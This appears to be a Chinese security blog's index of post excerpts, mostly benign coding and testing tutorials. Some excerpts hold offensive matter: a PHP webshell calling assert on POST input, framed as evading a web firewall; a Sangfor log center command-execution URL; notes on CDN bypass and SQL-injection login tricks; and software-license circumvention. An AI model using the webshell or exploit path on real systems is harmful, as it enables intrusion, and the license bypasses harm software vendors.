西米安全

原创 fastjson ＜=1.2.68 远程代码执行漏洞 学习

fastjson ＜=1.2.68 远程代码执行漏洞 学习1、 MAC2、Java版本为 1.8.0_261 。3、Mysql版本为 5.7 。我用的是PHPstudy集成的。4、IDEA版本随意。创建一个spring 项目mavcpom.xml引用fastjson创建demo_fastjson.java输出通过前面已经说到如何去利用，所以这里需要寻找一个子类或实现非常多的类或接口都行，在实际中还是主要看checkAutoType方法中，有哪些对象或接口可以通过校验，实际测试中存在如下几种：

转载 VMware 产品多个高危漏洞 (CVE-2022-22954,CVE-2022-22955,CVE-2022-22956,CVE-2022-22957,CVE-2022-22958,CVE-2022

漏洞详情VMware官方发布安全通告告，其中包含了影响VMware Workspace ONE Access、Identity Manager 和 vRealize Automation组件的多个高危漏洞（CVE-2022-22954、CVE-2022-22955、CVE-2022-22956、CVE-2022-22957、CVE-2022-22958、CVE-2022-22959、CVE-2022-22960、CVE-2022-22961），漏洞详情如下：CVE-2022-22954漏洞类型：远程命

转载 目录扫描之dirsearch工具推荐

dirsearch“ dirsearch”是一种成熟的命令行工具，旨在暴力破解Web服务器中的目录和文件。随着6年的增长，dirsearch现在已成为顶级的Web内容扫描仪。作为功能丰富的工具，dirsearch为用户提供了执行复杂的Web内容发现的机会，其中包含用于单词列表的许多矢量，高精度，令人印象深刻的性能，高级的连接/请求设置，现代的蛮力技术和出色的输出。下载地址：https://github.com/maurosoria/dirsearchdirsearch使用-u 指定网址

原创 绕过cdn方法之ICO图标获取真实IP

绕过cdn方法之–.ICO图标获取真实IP说明：ICO图标获取真实IP，绕过cdn方法操作：python3 编写替换代码中URL运行当前代码在shadan搜索输出的值，就能获取到真实ip地址import mmh3import requestsdef hashget(): response = requests.get('https://www.baidu.com/favicon.ico') favicon = response.content hash = m

原创 深信服行为感知系统&&日志中心 远程命令执行漏洞

标题声明1、该公众号发布文章仅供学习使用。2、请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。漏洞描述深信服行为感知系统&&日志中心 远程命令执行漏洞，使用与EDR相同模板和部分文件导致命令执行影响范围深信服 行为感知系统和日志中心漏洞复现漏洞地址：/tool/log/c.php?strip_slashes=system&host=首页：执行：https://ip/tool/log/c.php?strip_sla

原创 7z控制台命令执行打包文件

环境windos系统7z下载地址：https://www.7-zip.org/download.html操作：提取7z的2个文件，上传至目标服务器压缩地址目录控制台压缩#压缩文件夹##压缩 a 压缩后命名 压缩文件路径7z a test.zip D:\tools\lily5.0\Lily5.0...

原创 python3之读取xlsx列并写入txt文档

# python3#-*- coding:utf-8 _*-import xlrd# 写文件def writendata(data): name='writedemo.txt' w = open(name, 'a', encoding='utf-8') w.write(data + '\n') w.close() print('写入成功')def main2(): name='副本.xlsx' ncint=input('输入需要获取那.

原创 php免杀过狗变量覆盖

php免杀过狗变量覆盖<?phpfunction test($d){$a='ab';$ab=$d;echo $$a;$$a($_POST['a']);}test('assert');?>

原创 PyInstaller生成可执行exe程序

安装Pylnstallerpip install pyinstaller生成exe可执行文件进入需要生成exe的py目录，执行命令生产完成，在当前dist文件夹下pyinstaller 选项 Python 源文件

原创 Nmap

Nmapnmap端口状态解析**open ： 应用程序在该端口接收 TCP 连接或者 UDP 报文。closed ：关闭的端口对于nmap也是可访问的， 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。filtered ：由于包过滤阻止探测报文到达端口，nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备，路由规则 或者主机上的软件防火墙。unfiltered ...

原创 C#读取xml文件

带有命名空间(NameSpace)的XML文本解析<?xml version="1.0" encoding="utf-8" ?><bookstore xmlns="http://www.lucernepublishing.com" xml:base="http://www.semanticweb.org/ontologies/2012/2/Ontolog...

原创 Python-爬虫1

练手爬虫，获取urlfrom PIL import Imageimport win32api, win32con, win32guiimport re, osimport requestsfrom bs4 import BeautifulSoupimport lxmldef mmurl(): urlmm='https://mm.enterdesk.com/' ...

原创 Sockets客户端TCP

Sockets客户端TCPusing System;using System.Net.Sockets;using System.Text;using System.Threading;class SocketTcpClick { Socket socketClient; Thread threadClient; string se...

原创 python3-logging 保存打印本地

直接上干货'''输出打印报错本地sendlog.txt'''import logginglogger = logging.getLogger()logfile = 'test.log'hdlr = logging.FileHandler('sendlog.txt')formatter = logging.Formatter('%(asctime)s %(levelname)s ...

原创 python调用vlc拉rtsp流

python调用vlc拉rtsp流#!/usr/bin/python3#coding=utf-8import osimport _threadimport timeisFinished = Truedef startvlc(threadName, delay): print('启动线程A') #修改vlc安装地址， 访问的rtsp就可以直接用了 os.system...

原创 TeamViewer 14.1.18533H-俄罗斯-可换ID

1、亲测有效使用很长时间；按照好是英文，可自己切换为中文2、局域网远程可以自己设置通过IP地址访问tv连接哈，不会的可留言；下载地址：链接: https://pan.baidu.com/s/1rIAeVp6uMFwd_BKHsm8pTQ 提取码: ehw5...

原创 怎么做需求分析、需求分析功能点例子

原创 测试类型

原创 什么是软件测试

原创 Pycharm安装-激活

1、激活姿势1登陆网站或者激活码：http://idea.lanyus.com/负责完，在激活页面粘贴获取的激活信息：

原创 wireshark简单抓包命令

1、协议过滤：tcpudparpicmphttpsmtpftpdnsmsnmsipss例：udp.port==8089筛选udp协议 端口为8089 ，

原创 Beyond Compare 4 过期后怎么接着使用

版本：Beyond_Compare_4.1.9.21719.exe1、方法1：找到beyond Compare 4文件夹下面的BCUnrar.dll，将其删掉或者重命名，再重新打开接着使用！2、方法2：一劳永逸，修改注册表1)在搜索栏中输入 regedit ，打开注册表2)删除项目：计算机\HKEY_CURRENT_USER\Software\ScooterSoftware\...

原创 adb 如何连接夜神模拟器

1.打开夜神模拟器，打开设置，调成手机模式，初次进入的话，进入设置，点击版本号5次，可以激活使用开发者模式，进入后打开USB调试功能2.打开文件资源管理器，进入夜神模拟器的安装位置，在地址栏输入cmd，回车，会打开cmd窗口，进入的路径就是夜神模拟器的安装位置。我的默认安装位置：C:\Program Files (x86)\Nox\bin3.输入nox_adb.exe connect 12...

原创 windows常用命令-hs

1 纯真ip----批处理--扫描端口---默认账号administrator，user，guest，helpassi2 ipconfig本地ip查询 regedit---注册表命令 compmgmt.msc--计算机管理命令 secpol.msc本地安全策略 mstsc远程连接 net user 查看用户 net share 看机器开了多少共享 netstat -an看开了多

原创 C#-String字符串操作

贴代码。这些都是方法，不懂的留言 private void StSplit() { //检查所有字符串符号相同去掉 Char[] delimiChars = { ' ', ',', '.', ':', '\t' }; string text = "one\ttwo three:four,fi

原创 Google-黑客语法

我们知道要入侵一个有漏洞的网站肯定要去寻找这个网站怎么找这样的网站呢一般都是到谷歌和百度去的 谷歌个人喜欢点 为什么这么说谷歌比较轻松 百度限制太多了 入侵一个网站肯定要找他的后台吧 找后台如何找呢 可用工具 比如啊d和明小子或者御剑 我觉得御剑挺方便的 扫到后台先尝试万能密码 'or'='or'在账号密码输入万能密码尝试 登录不了再尝试sql注入 如果登录进去先找到数据库备份因为

原创 手机远程连接app-teamviewer

安卓手机远程连接软件teamviewer-远程连接-在家可以连接办公电脑，突破局域网限制链接：http://pan.baidu.com/s/1mim91pQ 密码：4ra2

原创 Kali 2.0安装VMware Tools

1.先安装好kail 。   2.0 2 . 加载vmware-tools镜像。3 . 打开光盘所在目录，将Vmware-tools的安装文件（Vmware-tools.***.tar.gz这个文件）拷贝到HOME目录。4. 解压缩（tar）该安装文件，并安装vmware-tools.1 tar zxvf VMwareTools-9.9.0-2304977.tar.gz2 3

原创 Selenium-java-框架启动主流浏览器

1 创建一个独立启动浏览器类 WebBrowpackage com.streamax.www;import java.util.concurrent.TimeUnit;import org.apache.log4j.Logger;import org.openqa.selenium.WebDriver;import org.openqa.selenium.chrome.Ch

原创 Centos-ip配置详解

1 搭建好Centos ，我这里是CentOS-6.7-x86_64-minimal  提供一个下载地址   链接：http://pan.baidu.com/s/1nvTUTh3 密码：xewk2 我是搭建在虚拟机，怎么安装自行baidu一下。3 安装完成，查看ip， 命令为 ifconfig， 如果显示为127.0.0.1 ，就需要先改ip4 先进入到cd  /etc/sysconfi

原创 Selenium-java-js操作日历

1 元素行input id="timeYEAR" class="config_timeset_input_2" type="text" readonly="readonly" onfocus="HS_setDate(this)" value="yyyy-mm-dd">2 java操作 JavascriptExecutor js = (JavascriptExecutor)

原创 Selenium-java-获取当前时间

1 获取当前时间 时分秒 // 获取当前时分秒 Calendar now = Calendar.getInstance(); int is = now.get(Calendar.HOUR_OF_DAY); int isf = now.get(Calendar.MINUTE); int iss = now.get(Ca

原创 Selenium-java-Log4j环境搭建和

1 导入Log4j ，我这版本是1.2.17  自己选择版本  **别告诉我不会导入2  Path  奶瓶3 创建一个与src同目录文件 命名为 log4.properties4 文件的内容是，  直接复制， ### 设置根 定义###log4j.rootLogger = info,stdout,I,E##ERROR、WARN、 INFO、DEBUG###### 输出信息到控制抬

原创 Selenium-java-XML启动用例类-简单1

最简单启动用例方法1 先建立xmlxml代码如下1 2 3 //随便命令4 5 class name="com.net.www.day_jingdong" /> //需要启动的类名 修改为自己的。 报名.类名6 7 8 在xml右击  Run As 启动就可以了2 test

原创 启动原生态火狐

Senlenium注意，支持的火狐版本问题。如启动不了当前版本，启动不能输入。建议安装43的。这是启动火狐的一个方法。火狐不用装驱动1 // 启动火狐2 public static void startfiref() {3 ProfilesIni allpro = new ProfilesIni(); 4 FirefoxProfile

原创 Selenium-java-testng插件安装eclipse

1 进入Help----Install2  点击 ADD   输入： TestNG    http://beust.com/eclipse    点击OK  3 等一会会加载出如下图，勾选，点击Next  下一步   4 同意，点击Finish。  5 可以休息一下，会自动下载安装。不用管6  如下图验证。

原创 Selenium-java-web常用操作---2

都是些的方法，一起交流交流上传文件1 private static void action2() {2 // TODO Auto-generated method stub3 WebElement elem = webdrver.findElement(By.id("load"));4 elem.sendKeys(new String[]

原创 selenium自动化-java-封断言类2

封装断言类 1 package streamax.com; 2 3 import java.util.ArrayList; 4 import java.util.List; 5 6 import org.testng.Assert; 7 /* 8 * 断言类 9 * 被調用判斷10 *11 */12 public class Assertion

原创 selenium自动化-java-封装断言

封装的断言。 1 package com.baidu.www; 2 3 import org.testng.Assert; 4 /* 5 * 封装断言 6 */ 7 public class assertion { 8 static boolean flog = true; 9 10 public static void verifyassert(Objec

原创 java环境变量详细配置步骤

1 下载jdk。 a 官网：http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html   本来准备云盘分享，结果云盘分享失败。 各位只能去官网下载。   自己下载，看自己是什么系统，这讲解windos设置。点下载之前，勾选到红色圈圈，不然不可以下载。2  安装傻瓜式安装， 记住安